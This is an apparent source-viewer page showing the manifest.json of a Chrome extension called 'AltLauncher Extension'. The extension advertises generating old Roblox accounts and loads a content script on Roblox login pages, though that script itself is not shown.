Need an account? Just click the generate button and get a old account quickly!
Premium users can view and search full source code, and see the source code differences
between two versions.
Upgrade to premium
manifest.json
{
"update_url": "https://clients2.google.com/service/update2/crx",
"name": "AltLauncher Extension",
"description": "Need an account? Just click the generate button and get a old account quickly!",
"version": "1.4.2",
"manifest_version": 2,
"content_scripts": [
{
"matches": [
"https://*.roblox.com/login",
"https://*.roblox.com/login?*",
"https://*.roblox.com/Login?*",
"https://*.roblox.com/NewLogin",
"https://*.roblox.com/newlogin",
"https://*.roblox.com/newlogin?*",
"https://*.roblox.com/NewLogin?*",
"https://*.roblox.com/NewLogin"
],
"js": [
"libraries/jquery.js",
"content.js"
]
}
],
"icons": {
"128": "icon.ico"
}
}